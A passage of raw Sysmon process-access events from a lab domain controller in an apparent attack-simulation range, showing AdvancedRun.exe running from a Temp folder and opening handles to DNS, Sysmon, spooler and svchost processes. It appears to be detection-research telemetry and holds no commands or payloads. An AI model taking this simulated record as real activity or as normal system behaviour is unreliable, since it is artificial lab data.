Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011660Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011659Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011658Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011657Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011656Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011655Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011654Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004011653Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011652Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011651Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011650Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011649Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011648Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011647Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004011646Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 